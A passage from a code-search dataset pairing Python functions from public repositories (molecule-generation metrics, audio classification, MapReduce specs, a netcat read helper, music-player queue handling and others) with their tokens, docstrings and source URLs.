"GPU",
"device",
"number",
"batch_size",
":",
"batch",
"size",
"for",
"FCD",
"metric",
"pool",
":",
"optional",
"multiprocessing",
"pool",
"to",
"use",
"for",
"parallelization"
] |
def get_all_metrics(gen, k=None, n_jobs=1,
device='cpu', batch_size=512, pool=None,
test=None, test_scaffolds=None,
ptest=None, ptest_scaffolds=None,
train=None):
"""
Computes all available metrics between test (scaffold test)
and generated sets of SMILES.
Parameters:
gen: list of generated SMILES
k: int or list with values for unique@k. Will calculate number of
unique molecules in the first k molecules. Default [1000, 10000]
n_jobs: number of workers for parallel processing
device: 'cpu' or 'cuda:n', where n is GPU device number
batch_size: batch size for FCD metric
pool: optional multiprocessing pool to use for parallelization
test (None or list): test SMILES. If None, will load
a default test set
test_scaffolds (None or list): scaffold test SMILES. If None, will
load a default scaffold test set
ptest (None or dict): precalculated statistics of the test set. If
None, will load default test statistics. If you specified a custom
test set, default test statistics will be ignored
ptest_scaffolds (None or dict): precalculated statistics of the
scaffold test set If None, will load default scaffold test
statistics. If you specified a custom test set, default test
statistics will be ignored
train (None or list): train SMILES. If None, will load a default
train set
Available metrics:
* %valid
* %unique@k
* Frechet ChemNet Distance (FCD)
* Fragment similarity (Frag)
* Scaffold similarity (Scaf)
* Similarity to nearest neighbour (SNN)
* Internal diversity (IntDiv)
* Internal diversity 2: using square root of mean squared
Tanimoto similarity (IntDiv2)
* %passes filters (Filters)
* Distribution difference for logP, SA, QED, weight
* Novelty (molecules not present in train)
"""
if test is None:
if ptest is not None:
raise ValueError(
"You cannot specify custom test "
"statistics for default test set")
test = get_dataset('test')
ptest = get_statistics('test')
if test_scaffolds is None:
if ptest_scaffolds is not None:
raise ValueError(
"You cannot specify custom scaffold test "
"statistics for default scaffold test set")
test_scaffolds = get_dataset('test_scaffolds')
ptest_scaffolds = get_statistics('test_scaffolds')
train = train or get_dataset('train')
if k is None:
k = [1000, 10000]
disable_rdkit_log()
metrics = {}
close_pool = False
if pool is None:
if n_jobs != 1:
pool = Pool(n_jobs)
close_pool = True
else:
pool = 1
metrics['valid'] = fraction_valid(gen, n_jobs=pool)
gen = remove_invalid(gen, canonize=True)
if not isinstance(k, (list, tuple)):
k = [k]
for _k in k:
metrics['unique@{}'.format(_k)] = fraction_unique(gen, _k, pool)
if ptest is None:
ptest = compute_intermediate_statistics(test, n_jobs=n_jobs,
device=device,
batch_size=batch_size,
pool=pool)
if test_scaffolds is not None and ptest_scaffolds is None:
ptest_scaffolds = compute_intermediate_statistics(
test_scaffolds, n_jobs=n_jobs,
device=device, batch_size=batch_size,
pool=pool
)
mols = mapper(pool)(get_mol, gen)
kwargs = {'n_jobs': pool, 'device': device, 'batch_size': batch_size}
kwargs_fcd = {'n_jobs': n_jobs, 'device': device, 'batch_size': batch_size}
metrics['FCD/Test'] = FCDMetric(**kwargs_fcd)(gen=gen, pref=ptest['FCD'])
metrics['SNN/Test'] = SNNMetric(**kwargs)(gen=mols, pref=ptest['SNN'])
metrics['Frag/Test'] = FragMetric(**kwargs)(gen=mols, pref=ptest['Frag'])
metrics['Scaf/Test'] = ScafMetric(**kwargs)(gen=mols, pref=ptest['Scaf'])
if ptest_scaffolds is not None:
metrics['FCD/TestSF'] = FCDMetric(**kwargs_fcd)(
gen=gen, pref=ptest_scaffolds['FCD']
)
metrics['SNN/TestSF'] = SNNMetric(**kwargs)(
gen=mols, pref=ptest_scaffolds['SNN']
)
metrics['Frag/TestSF'] = FragMetric(**kwargs)(
gen=mols, pref=ptest_scaffolds['Frag']
)
metrics['Scaf/TestSF'] = ScafMetric(**kwargs)(
gen=mols, pref=ptest_scaffolds['Scaf']
)
metrics['IntDiv'] = internal_diversity(mols, pool, device=device)
metrics['IntDiv2'] = internal_diversity(mols, pool, device=device, p=2)
metrics['Filters'] = fraction_passes_filters(mols, pool)
# Properties
for name, func in [('logP', logP), ('SA', SA),
('QED', QED),
('weight', weight)]:
metrics[name] = WassersteinMetric(func, **kwargs)(
gen=mols, pref=ptest[name])
if train is not None:
metrics['Novelty'] = novelty(mols, train, pool)
enable_rdkit_log()
if close_pool:
pool.close()
pool.join()
return metrics
|
[
"def",
"get_all_metrics",
"(",
"gen",
",",
"k",
"=",
"None",
",",
"n_jobs",
"=",
"1",
",",
"device",
"=",
"'cpu'",
",",
"batch_size",
"=",
"512",
",",
"pool",
"=",
"None",
",",
"test",
"=",
"None",
",",
"test_scaffolds",
"=",
"None",
",",
"ptest",
"=",
"None",
",",
"ptest_scaffolds",
"=",
"None",
",",
"train",
"=",
"None",
")",
":",
"if",
"test",
"is",
"None",
":",
"if",
"ptest",
"is",
"not",
"None",
":",
"raise",
"ValueError",
"(",
"\"You cannot specify custom test \"",
"\"statistics for default test set\"",
")",
"test",
"=",
"get_dataset",
"(",
"'test'",
")",
"ptest",
"=",
"get_statistics",
"(",
"'test'",
")",
"if",
"test_scaffolds",
"is",
"None",
":",
"if",
"ptest_scaffolds",
"is",
"not",
"None",
":",
"raise",
"ValueError",
"(",
"\"You cannot specify custom scaffold test \"",
"\"statistics for default scaffold test set\"",
")",
"test_scaffolds",
"=",
"get_dataset",
"(",
"'test_scaffolds'",
")",
"ptest_scaffolds",
"=",
"get_statistics",
"(",
"'test_scaffolds'",
")",
"train",
"=",
"train",
"or",
"get_dataset",
"(",
"'train'",
")",
"if",
"k",
"is",
"None",
":",
"k",
"=",
"[",
"1000",
",",
"10000",
"]",
"disable_rdkit_log",
"(",
")",
"metrics",
"=",
"{",
"}",
"close_pool",
"=",
"False",
"if",
"pool",
"is",
"None",
":",
"if",
"n_jobs",
"!=",
"1",
":",
"pool",
"=",
"Pool",
"(",
"n_jobs",
")",
"close_pool",
"=",
"True",
"else",
":",
"pool",
"=",
"1",
"metrics",
"[",
"'valid'",
"]",
"=",
"fraction_valid",
"(",
"gen",
",",
"n_jobs",
"=",
"pool",
")",
"gen",
"=",
"remove_invalid",
"(",
"gen",
",",
"canonize",
"=",
"True",
")",
"if",
"not",
"isinstance",
"(",
"k",
",",
"(",
"list",
",",
"tuple",
")",
")",
":",
"k",
"=",
"[",
"k",
"]",
"for",
"_k",
"in",
"k",
":",
"metrics",
"[",
"'unique@{}'",
".",
"format",
"(",
"_k",
")",
"]",
"=",
"fraction_unique",
"(",
"gen",
",",
"_k",
",",
"pool",
")",
"if",
"ptest",
"is",
"None",
":",
"ptest",
"=",
"compute_intermediate_statistics",
"(",
"test",
",",
"n_jobs",
"=",
"n_jobs",
",",
"device",
"=",
"device",
",",
"batch_size",
"=",
"batch_size",
",",
"pool",
"=",
"pool",
")",
"if",
"test_scaffolds",
"is",
"not",
"None",
"and",
"ptest_scaffolds",
"is",
"None",
":",
"ptest_scaffolds",
"=",
"compute_intermediate_statistics",
"(",
"test_scaffolds",
",",
"n_jobs",
"=",
"n_jobs",
",",
"device",
"=",
"device",
",",
"batch_size",
"=",
"batch_size",
",",
"pool",
"=",
"pool",
")",
"mols",
"=",
"mapper",
"(",
"pool",
")",
"(",
"get_mol",
",",
"gen",
")",
"kwargs",
"=",
"{",
"'n_jobs'",
":",
"pool",
",",
"'device'",
":",
"device",
",",
"'batch_size'",
":",
"batch_size",
"}",
"kwargs_fcd",
"=",
"{",
"'n_jobs'",
":",
"n_jobs",
",",
"'device'",
":",
"device",
",",
"'batch_size'",
":",
"batch_size",
"}",
"metrics",
"[",
"'FCD/Test'",
"]",
"=",
"FCDMetric",
"(",
"*",
"*",
"kwargs_fcd",
")",
"(",
"gen",
"=",
"gen",
",",
"pref",
"=",
"ptest",
"[",
"'FCD'",
"]",
")",
"metrics",
"[",
"'SNN/Test'",
"]",
"=",
"SNNMetric",
"(",
"*",
"*",
"kwargs",
")",
"(",
"gen",
"=",
"mols",
",",
"pref",
"=",
"ptest",
"[",
"'SNN'",
"]",
")",
"metrics",
"[",
"'Frag/Test'",
"]",
"=",
"FragMetric",
"(",
"*",
"*",
"kwargs",
")",
"(",
"gen",
"=",
"mols",
",",
"pref",
"=",
"ptest",
"[",
"'Frag'",
"]",
")",
"metrics",
"[",
"'Scaf/Test'",
"]",
"=",
"ScafMetric",
"(",
"*",
"*",
"kwargs",
")",
"(",
"gen",
"=",
"mols",
",",
"pref",
"=",
"ptest",
"[",
"'Scaf'",
"]",
")",
"if",
"ptest_scaffolds",
"is",
"not",
"None",
":",
"metrics",
"[",
"'FCD/TestSF'",
"]",
"=",
"FCDMetric",
"(",
"*",
"*",
"kwargs_fcd",
")",
"(",
"gen",
"=",
"gen",
",",
"pref",
"=",
"ptest_scaffolds",
"[",
"'FCD'",
"]",
")",
"metrics",
"[",
"'SNN/TestSF'",
"]",
"=",
"SNNMetric",
"(",
"*",
"*",
"kwargs",
")",
"(",
"gen",
"=",
"mols",
",",
"pref",
"=",
"ptest_scaffolds",
"[",
"'SNN'",
"]",
")",
"metrics",
"[",
"'Frag/TestSF'",
"]",
"=",
"FragMetric",
"(",
"*",
"*",
"kwargs",
")",
"(",
"gen",
"=",
"mols",
",",
"pref",
"=",
"ptest_scaffolds",
"[",
"'Frag'",
"]",
")",
"metrics",
"[",
"'Scaf/TestSF'",
"]",
"=",
"ScafMetric",
"(",
"*",
"*",
"kwargs",
")",
"(",
"gen",
"=",
"mols",
",",
"pref",
"=",
"ptest_scaffolds",
"[",
"'Scaf'",
"]",
")",
"metrics",
"[",
"'IntDiv'",
"]",
"=",
"internal_diversity",
"(",
"mols",
",",
"pool",
",",
"device",
"=",
"device",
")",
"metrics",
"[",
"'IntDiv2'",
"]",
"=",
"internal_diversity",
"(",
"mols",
",",
"pool",
",",
"device",
"=",
"device",
",",
"p",
"=",
"2",
")",
"metrics",
"[",
"'Filters'",
"]",
"=",
"fraction_passes_filters",
"(",
"mols",
",",
"pool",
")",
"# Properties",
"for",
"name",
",",
"func",
"in",
"[",
"(",
"'logP'",
",",
"logP",
")",
",",
"(",
"'SA'",
",",
"SA",
")",
",",
"(",
"'QED'",
",",
"QED",
")",
",",
"(",
"'weight'",
",",
"weight",
")",
"]",
":",
"metrics",
"[",
"name",
"]",
"=",
"WassersteinMetric",
"(",
"func",
",",
"*",
"*",
"kwargs",
")",
"(",
"gen",
"=",
"mols",
",",
"pref",
"=",
"ptest",
"[",
"name",
"]",
")",
"if",
"train",
"is",
"not",
"None",
":",
"metrics",
"[",
"'Novelty'",
"]",
"=",
"novelty",
"(",
"mols",
",",
"train",
",",
"pool",
")",
"enable_rdkit_log",
"(",
")",
"if",
"close_pool",
":",
"pool",
".",
"close",
"(",
")",
"pool",
".",
"join",
"(",
")",
"return",
"metrics"
] |
https://github.com/molecularsets/moses/blob/7b8f83b21a9b7ded493349ec8ef292384ce2bb52/moses/metrics/metrics.py#L17-L146
|
|
researchmm/tasn
|
5dba8ccc096cedc63913730eeea14a9647911129
|
tasn-mxnet/benchmark/python/sparse/memory_benchmark.py
|
python
|
bench_dot
|
(lhs_row_dim, lhs_col_dim, rhs_col_dim, density,
rhs_density, dot_func, trans_lhs, lhs_stype,
rhs_stype, only_storage, distribution="uniform")
|
Benchmarking both storage and dot
|
Benchmarking both storage and dot
|
[
"Benchmarking",
"both",
"storage",
"and",
"dot"
] |
def bench_dot(lhs_row_dim, lhs_col_dim, rhs_col_dim, density,
rhs_density, dot_func, trans_lhs, lhs_stype,
rhs_stype, only_storage, distribution="uniform"):
""" Benchmarking both storage and dot
"""
lhs_nd = rand_ndarray((lhs_row_dim, lhs_col_dim), lhs_stype, density, distribution=distribution)
if not only_storage:
rhs_nd = rand_ndarray((lhs_col_dim, rhs_col_dim), rhs_stype,
density=rhs_density, distribution=distribution)
out = dot_func(lhs_nd, rhs_nd, trans_lhs)
mx.nd.waitall()
|
[
"def",
"bench_dot",
"(",
"lhs_row_dim",
",",
"lhs_col_dim",
",",
"rhs_col_dim",
",",
"density",
",",
"rhs_density",
",",
"dot_func",
",",
"trans_lhs",
",",
"lhs_stype",
",",
"rhs_stype",
",",
"only_storage",
",",
"distribution",
"=",
"\"uniform\"",
")",
":",
"lhs_nd",
"=",
"rand_ndarray",
"(",
"(",
"lhs_row_dim",
",",
"lhs_col_dim",
")",
",",
"lhs_stype",
",",
"density",
",",
"distribution",
"=",
"distribution",
")",
"if",
"not",
"only_storage",
":",
"rhs_nd",
"=",
"rand_ndarray",
"(",
"(",
"lhs_col_dim",
",",
"rhs_col_dim",
")",
",",
"rhs_stype",
",",
"density",
"=",
"rhs_density",
",",
"distribution",
"=",
"distribution",
")",
"out",
"=",
"dot_func",
"(",
"lhs_nd",
",",
"rhs_nd",
",",
"trans_lhs",
")",
"mx",
".",
"nd",
".",
"waitall",
"(",
")"
] |
https://github.com/researchmm/tasn/blob/5dba8ccc096cedc63913730eeea14a9647911129/tasn-mxnet/benchmark/python/sparse/memory_benchmark.py#L79-L89
|
||
Qirky/FoxDot
|
76318f9630bede48ff3994146ed644affa27bfa4
|
FoxDot/lib/SCLang/SynthDef.py
|
python
|
SynthDefBaseClass.get_base_class_variables
|
(self)
|
return "var {};".format(", ".join(self.var))
|
[] |
def get_base_class_variables(self):
return "var {};".format(", ".join(self.var))
|
[
"def",
"get_base_class_variables",
"(",
"self",
")",
":",
"return",
"\"var {};\"",
".",
"format",
"(",
"\", \"",
".",
"join",
"(",
"self",
".",
"var",
")",
")"
] |
https://github.com/Qirky/FoxDot/blob/76318f9630bede48ff3994146ed644affa27bfa4/FoxDot/lib/SCLang/SynthDef.py#L183-L184
|
|||
ctfs/write-ups-2014
|
b02bcbb2737907dd0aa39c5d4df1d1e270958f54
|
asis-ctf-finals-2014/xorqr/netcatlib/netcatlib.py
|
python
|
Netcat.read_some
|
(self, amount=1)
|
return buf
|
Read at least one byte of buffered data unless EOF is hit.
Return '' if EOF is hit. Block if no data is immediately
available.
|
Read at least one byte of buffered data unless EOF is hit.
|
[
"Read",
"at",
"least",
"one",
"byte",
"of",
"buffered",
"data",
"unless",
"EOF",
"is",
"hit",
"."
] |
def read_some(self, amount=1):
"""Read at least one byte of buffered data unless EOF is hit.
Return '' if EOF is hit. Block if no data is immediately
available.
"""
while not self.buffer and len(self.buffer) < amount and not self.eof:
self.recv_blocking()
buf = self.buffer
self.buffer = ''
return buf
|
[
"def",
"read_some",
"(",
"self",
",",
"amount",
"=",
"1",
")",
":",
"while",
"not",
"self",
".",
"buffer",
"and",
"len",
"(",
"self",
".",
"buffer",
")",
"<",
"amount",
"and",
"not",
"self",
".",
"eof",
":",
"self",
".",
"recv_blocking",
"(",
")",
"buf",
"=",
"self",
".",
"buffer",
"self",
".",
"buffer",
"=",
"''",
"return",
"buf"
] |
https://github.com/ctfs/write-ups-2014/blob/b02bcbb2737907dd0aa39c5d4df1d1e270958f54/asis-ctf-finals-2014/xorqr/netcatlib/netcatlib.py#L251-L262
|
|
NVIDIA/DeepLearningExamples
|
589604d49e016cd9ef4525f7abcc9c7b826cfc5e
|
TensorFlow/Detection/SSD/models/research/object_detection/metrics/coco_tools.py
|
python
|
COCOEvalWrapper.GetCategory
|
(self, category_id)
|
return self.cocoGt.cats[category_id]
|
Fetches dictionary holding category information given category id.
Args:
category_id: integer id
Returns:
dictionary holding 'id', 'name'.
|
Fetches dictionary holding category information given category id.
|
[
"Fetches",
"dictionary",
"holding",
"category",
"information",
"given",
"category",
"id",
"."
] |
def GetCategory(self, category_id):
"""Fetches dictionary holding category information given category id.
Args:
category_id: integer id
Returns:
dictionary holding 'id', 'name'.
"""
return self.cocoGt.cats[category_id]
|
[
"def",
"GetCategory",
"(",
"self",
",",
"category_id",
")",
":",
"return",
"self",
".",
"cocoGt",
".",
"cats",
"[",
"category_id",
"]"
] |
https://github.com/NVIDIA/DeepLearningExamples/blob/589604d49e016cd9ef4525f7abcc9c7b826cfc5e/TensorFlow/Detection/SSD/models/research/object_detection/metrics/coco_tools.py#L175-L183
|
|
tyiannak/pyAudioAnalysis
|
979c8635e5b6292283b5ee050868d087a55c6371
|
pyAudioAnalysis/audioSegmentation.py
|
python
|
mid_term_file_classification
|
(input_file, model_name, model_type,
plot_results=False, gt_file="")
|
return labels, class_names, accuracy, cm
|
This function performs mid-term classification of an audio stream.
Towards this end, supervised knowledge is used,
i.e. a pre-trained classifier.
ARGUMENTS:
- input_file: path of the input WAV file
- model_name: name of the classification model
- model_type: svm or knn depending on the classifier type
- plot_results: True if results are to be plotted using
matplotlib along with a set of statistics
RETURNS:
- segs: a sequence of segment's endpoints: segs[i] is the
endpoint of the i-th segment (in seconds)
- classes: a sequence of class flags: class[i] is the
class ID of the i-th segment
|
This function performs mid-term classification of an audio stream.
Towards this end, supervised knowledge is used,
i.e. a pre-trained classifier.
ARGUMENTS:
- input_file: path of the input WAV file
- model_name: name of the classification model
- model_type: svm or knn depending on the classifier type
- plot_results: True if results are to be plotted using
matplotlib along with a set of statistics
|
[
"This",
"function",
"performs",
"mid",
"-",
"term",
"classification",
"of",
"an",
"audio",
"stream",
".",
"Towards",
"this",
"end",
"supervised",
"knowledge",
"is",
"used",
"i",
".",
"e",
".",
"a",
"pre",
"-",
"trained",
"classifier",
".",
"ARGUMENTS",
":",
"-",
"input_file",
":",
"path",
"of",
"the",
"input",
"WAV",
"file",
"-",
"model_name",
":",
"name",
"of",
"the",
"classification",
"model",
"-",
"model_type",
":",
"svm",
"or",
"knn",
"depending",
"on",
"the",
"classifier",
"type",
"-",
"plot_results",
":",
"True",
"if",
"results",
"are",
"to",
"be",
"plotted",
"using",
"matplotlib",
"along",
"with",
"a",
"set",
"of",
"statistics"
] |
def mid_term_file_classification(input_file, model_name, model_type,
plot_results=False, gt_file=""):
"""
This function performs mid-term classification of an audio stream.
Towards this end, supervised knowledge is used,
i.e. a pre-trained classifier.
ARGUMENTS:
- input_file: path of the input WAV file
- model_name: name of the classification model
- model_type: svm or knn depending on the classifier type
- plot_results: True if results are to be plotted using
matplotlib along with a set of statistics
RETURNS:
- segs: a sequence of segment's endpoints: segs[i] is the
endpoint of the i-th segment (in seconds)
- classes: a sequence of class flags: class[i] is the
class ID of the i-th segment
"""
labels = []
accuracy = 0.0
class_names = []
cm = np.array([])
if not os.path.isfile(model_name):
print("mtFileClassificationError: input model_type not found!")
return labels, class_names, accuracy, cm
# Load classifier:
if model_type == "knn":
classifier, mean, std, class_names, mt_win, mid_step, st_win, \
st_step, compute_beat = at.load_model_knn(model_name)
else:
classifier, mean, std, class_names, mt_win, mid_step, st_win, \
st_step, compute_beat = at.load_model(model_name)
if compute_beat:
print("Model " + model_name + " contains long-term music features "
"(beat etc) and cannot be used in "
"segmentation")
return labels, class_names, accuracy, cm
# load input file
sampling_rate, signal = audioBasicIO.read_audio_file(input_file)
# could not read file
if sampling_rate == 0:
return labels, class_names, accuracy, cm
# convert stereo (if) to mono
signal = audioBasicIO.stereo_to_mono(signal)
# mid-term feature extraction:
mt_feats, _, _ = \
mtf.mid_feature_extraction(signal, sampling_rate,
mt_win * sampling_rate,
mid_step * sampling_rate,
round(sampling_rate * st_win),
round(sampling_rate * st_step))
posterior_matrix = []
# for each feature vector (i.e. for each fix-sized segment):
for col_index in range(mt_feats.shape[1]):
# normalize current feature v
feature_vector = (mt_feats[:, col_index] - mean) / std
# classify vector:
label_predicted, posterior = \
at.classifier_wrapper(classifier, model_type, feature_vector)
labels.append(label_predicted)
# update probability matrix
posterior_matrix.append(np.max(posterior))
labels = np.array(labels)
# convert fix-sized flags to segments and classes
segs, classes = labels_to_segments(labels, mid_step)
segs[-1] = len(signal) / float(sampling_rate)
# Load grount-truth:
labels_gt, class_names_gt, accuracy, cm = \
load_ground_truth(gt_file, labels, class_names, mid_step, plot_results)
return labels, class_names, accuracy, cm
|
[
"def",
"mid_term_file_classification",
"(",
"input_file",
",",
"model_name",
",",
"model_type",
",",
"plot_results",
"=",
"False",
",",
"gt_file",
"=",
"\"\"",
")",
":",
"labels",
"=",
"[",
"]",
"accuracy",
"=",
"0.0",
"class_names",
"=",
"[",
"]",
"cm",
"=",
"np",
".",
"array",
"(",
"[",
"]",
")",
"if",
"not",
"os",
".",
"path",
".",
"isfile",
"(",
"model_name",
")",
":",
"print",
"(",
"\"mtFileClassificationError: input model_type not found!\"",
")",
"return",
"labels",
",",
"class_names",
",",
"accuracy",
",",
"cm",
"# Load classifier:",
"if",
"model_type",
"==",
"\"knn\"",
":",
"classifier",
",",
"mean",
",",
"std",
",",
"class_names",
",",
"mt_win",
",",
"mid_step",
",",
"st_win",
",",
"st_step",
",",
"compute_beat",
"=",
"at",
".",
"load_model_knn",
"(",
"model_name",
")",
"else",
":",
"classifier",
",",
"mean",
",",
"std",
",",
"class_names",
",",
"mt_win",
",",
"mid_step",
",",
"st_win",
",",
"st_step",
",",
"compute_beat",
"=",
"at",
".",
"load_model",
"(",
"model_name",
")",
"if",
"compute_beat",
":",
"print",
"(",
"\"Model \"",
"+",
"model_name",
"+",
"\" contains long-term music features \"",
"\"(beat etc) and cannot be used in \"",
"\"segmentation\"",
")",
"return",
"labels",
",",
"class_names",
",",
"accuracy",
",",
"cm",
"# load input file",
"sampling_rate",
",",
"signal",
"=",
"audioBasicIO",
".",
"read_audio_file",
"(",
"input_file",
")",
"# could not read file",
"if",
"sampling_rate",
"==",
"0",
":",
"return",
"labels",
",",
"class_names",
",",
"accuracy",
",",
"cm",
"# convert stereo (if) to mono",
"signal",
"=",
"audioBasicIO",
".",
"stereo_to_mono",
"(",
"signal",
")",
"# mid-term feature extraction:",
"mt_feats",
",",
"_",
",",
"_",
"=",
"mtf",
".",
"mid_feature_extraction",
"(",
"signal",
",",
"sampling_rate",
",",
"mt_win",
"*",
"sampling_rate",
",",
"mid_step",
"*",
"sampling_rate",
",",
"round",
"(",
"sampling_rate",
"*",
"st_win",
")",
",",
"round",
"(",
"sampling_rate",
"*",
"st_step",
")",
")",
"posterior_matrix",
"=",
"[",
"]",
"# for each feature vector (i.e. for each fix-sized segment):",
"for",
"col_index",
"in",
"range",
"(",
"mt_feats",
".",
"shape",
"[",
"1",
"]",
")",
":",
"# normalize current feature v",
"feature_vector",
"=",
"(",
"mt_feats",
"[",
":",
",",
"col_index",
"]",
"-",
"mean",
")",
"/",
"std",
"# classify vector:",
"label_predicted",
",",
"posterior",
"=",
"at",
".",
"classifier_wrapper",
"(",
"classifier",
",",
"model_type",
",",
"feature_vector",
")",
"labels",
".",
"append",
"(",
"label_predicted",
")",
"# update probability matrix",
"posterior_matrix",
".",
"append",
"(",
"np",
".",
"max",
"(",
"posterior",
")",
")",
"labels",
"=",
"np",
".",
"array",
"(",
"labels",
")",
"# convert fix-sized flags to segments and classes",
"segs",
",",
"classes",
"=",
"labels_to_segments",
"(",
"labels",
",",
"mid_step",
")",
"segs",
"[",
"-",
"1",
"]",
"=",
"len",
"(",
"signal",
")",
"/",
"float",
"(",
"sampling_rate",
")",
"# Load grount-truth:",
"labels_gt",
",",
"class_names_gt",
",",
"accuracy",
",",
"cm",
"=",
"load_ground_truth",
"(",
"gt_file",
",",
"labels",
",",
"class_names",
",",
"mid_step",
",",
"plot_results",
")",
"return",
"labels",
",",
"class_names",
",",
"accuracy",
",",
"cm"
] |
https://github.com/tyiannak/pyAudioAnalysis/blob/979c8635e5b6292283b5ee050868d087a55c6371/pyAudioAnalysis/audioSegmentation.py#L518-L597
|
|
mkusner/grammarVAE
|
ffffe272a8cf1772578dfc92254c55c224cddc02
|
Theano-master/theano/tensor/opt.py
|
python
|
local_add_mul_fusion
|
(node)
|
Fuse consecutive add or mul in one such node with more inputs.
It is better to fuse add/mul that way then in a Composite node as
this make the inner graph of the Compiste smaller. This allow to
put more computation in a Composite before hitting the max
recusion limit when pickling Composite.
|
Fuse consecutive add or mul in one such node with more inputs.
|
[
"Fuse",
"consecutive",
"add",
"or",
"mul",
"in",
"one",
"such",
"node",
"with",
"more",
"inputs",
"."
] |
def local_add_mul_fusion(node):
"""Fuse consecutive add or mul in one such node with more inputs.
It is better to fuse add/mul that way then in a Composite node as
this make the inner graph of the Compiste smaller. This allow to
put more computation in a Composite before hitting the max
recusion limit when pickling Composite.
"""
if (not isinstance(node.op, Elemwise) or
not isinstance(node.op.scalar_op, (scalar.Add, scalar.Mul))):
return False
s_op = node.op.scalar_op.__class__
for inp in node.inputs:
if (inp.owner and
isinstance(inp.owner.op, Elemwise) and
isinstance(inp.owner.op.scalar_op, s_op)):
l = list(node.inputs)
l.remove(inp)
output_node = node.op(*(l + inp.owner.inputs))
copy_stack_trace(node.outputs[0], output_node)
return [output_node]
|
[
"def",
"local_add_mul_fusion",
"(",
"node",
")",
":",
"if",
"(",
"not",
"isinstance",
"(",
"node",
".",
"op",
",",
"Elemwise",
")",
"or",
"not",
"isinstance",
"(",
"node",
".",
"op",
".",
"scalar_op",
",",
"(",
"scalar",
".",
"Add",
",",
"scalar",
".",
"Mul",
")",
")",
")",
":",
"return",
"False",
"s_op",
"=",
"node",
".",
"op",
".",
"scalar_op",
".",
"__class__",
"for",
"inp",
"in",
"node",
".",
"inputs",
":",
"if",
"(",
"inp",
".",
"owner",
"and",
"isinstance",
"(",
"inp",
".",
"owner",
".",
"op",
",",
"Elemwise",
")",
"and",
"isinstance",
"(",
"inp",
".",
"owner",
".",
"op",
".",
"scalar_op",
",",
"s_op",
")",
")",
":",
"l",
"=",
"list",
"(",
"node",
".",
"inputs",
")",
"l",
".",
"remove",
"(",
"inp",
")",
"output_node",
"=",
"node",
".",
"op",
"(",
"*",
"(",
"l",
"+",
"inp",
".",
"owner",
".",
"inputs",
")",
")",
"copy_stack_trace",
"(",
"node",
".",
"outputs",
"[",
"0",
"]",
",",
"output_node",
")",
"return",
"[",
"output_node",
"]"
] |
https://github.com/mkusner/grammarVAE/blob/ffffe272a8cf1772578dfc92254c55c224cddc02/Theano-master/theano/tensor/opt.py#L6745-L6768
|
||
FriedAppleTeam/FRAPL
|
89c14d57e0cc77b915fe1e95f60e9e1847699103
|
Framework/FridaLink/FridaLink/Core/MemoryEngine.py
|
python
|
MemoryEngineProtocol.generateMemoryID
|
(self, address)
|
return mem_id
|
[] |
def generateMemoryID(self, address):
idx = 0
mem_id = "0x%X_%d" % (address, idx)
while mem_id in self.memoryMap:
idx += 1
mem_id = "0x%X_%d" % (address, idx)
return mem_id
|
[
"def",
"generateMemoryID",
"(",
"self",
",",
"address",
")",
":",
"idx",
"=",
"0",
"mem_id",
"=",
"\"0x%X_%d\"",
"%",
"(",
"address",
",",
"idx",
")",
"while",
"mem_id",
"in",
"self",
".",
"memoryMap",
":",
"idx",
"+=",
"1",
"mem_id",
"=",
"\"0x%X_%d\"",
"%",
"(",
"address",
",",
"idx",
")",
"return",
"mem_id"
] |
https://github.com/FriedAppleTeam/FRAPL/blob/89c14d57e0cc77b915fe1e95f60e9e1847699103/Framework/FridaLink/FridaLink/Core/MemoryEngine.py#L73-L79
|
|||
AppScale/gts
|
46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9
|
AppServer/google/appengine/ext/mapreduce/model.py
|
python
|
MapperSpec.__init__
|
(self,
handler_spec,
input_reader_spec,
params,
shard_count,
output_writer_spec=None)
|
Creates a new MapperSpec.
Args:
handler_spec: handler specification as string (see class doc for
details).
input_reader_spec: The class name of the input reader to use.
params: Dictionary of additional parameters for the mapper.
shard_count: number of shards to process in parallel.
Properties:
handler_spec: name of handler class/function to use.
input_reader_spec: The class name of the input reader to use.
params: Dictionary of additional parameters for the mapper.
shard_count: number of shards to process in parallel.
output_writer_spec: The class name of the output writer to use.
|
Creates a new MapperSpec.
|
[
"Creates",
"a",
"new",
"MapperSpec",
"."
] |
def __init__(self,
handler_spec,
input_reader_spec,
params,
shard_count,
output_writer_spec=None):
"""Creates a new MapperSpec.
Args:
handler_spec: handler specification as string (see class doc for
details).
input_reader_spec: The class name of the input reader to use.
params: Dictionary of additional parameters for the mapper.
shard_count: number of shards to process in parallel.
Properties:
handler_spec: name of handler class/function to use.
input_reader_spec: The class name of the input reader to use.
params: Dictionary of additional parameters for the mapper.
shard_count: number of shards to process in parallel.
output_writer_spec: The class name of the output writer to use.
"""
self.handler_spec = handler_spec
self.input_reader_spec = input_reader_spec
self.output_writer_spec = output_writer_spec
self.shard_count = int(shard_count)
self.params = params
|
[
"def",
"__init__",
"(",
"self",
",",
"handler_spec",
",",
"input_reader_spec",
",",
"params",
",",
"shard_count",
",",
"output_writer_spec",
"=",
"None",
")",
":",
"self",
".",
"handler_spec",
"=",
"handler_spec",
"self",
".",
"input_reader_spec",
"=",
"input_reader_spec",
"self",
".",
"output_writer_spec",
"=",
"output_writer_spec",
"self",
".",
"shard_count",
"=",
"int",
"(",
"shard_count",
")",
"self",
".",
"params",
"=",
"params"
] |
https://github.com/AppScale/gts/blob/46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9/AppServer/google/appengine/ext/mapreduce/model.py#L375-L401
|
||
quodlibet/quodlibet
|
e3099c89f7aa6524380795d325cc14630031886c
|
quodlibet/qltk/songmodel.py
|
python
|
PlaylistMux.unqueue
|
(self, songs)
|
Remove all occurrences of all passed songs in the queue
|
Remove all occurrences of all passed songs in the queue
|
[
"Remove",
"all",
"occurrences",
"of",
"all",
"passed",
"songs",
"in",
"the",
"queue"
] |
def unqueue(self, songs):
"""Remove all occurrences of all passed songs in the queue"""
q = self.q
for iter_ in q.find_all(songs):
q.remove(iter_)
|
[
"def",
"unqueue",
"(",
"self",
",",
"songs",
")",
":",
"q",
"=",
"self",
".",
"q",
"for",
"iter_",
"in",
"q",
".",
"find_all",
"(",
"songs",
")",
":",
"q",
".",
"remove",
"(",
"iter_",
")"
] |
https://github.com/quodlibet/quodlibet/blob/e3099c89f7aa6524380795d325cc14630031886c/quodlibet/qltk/songmodel.py#L139-L144
|
||
yt-project/yt
|
dc7b24f9b266703db4c843e329c6c8644d47b824
|
yt/visualization/plot_container.py
|
python
|
PlotContainer.get_log
|
(self, field)
|
return log
|
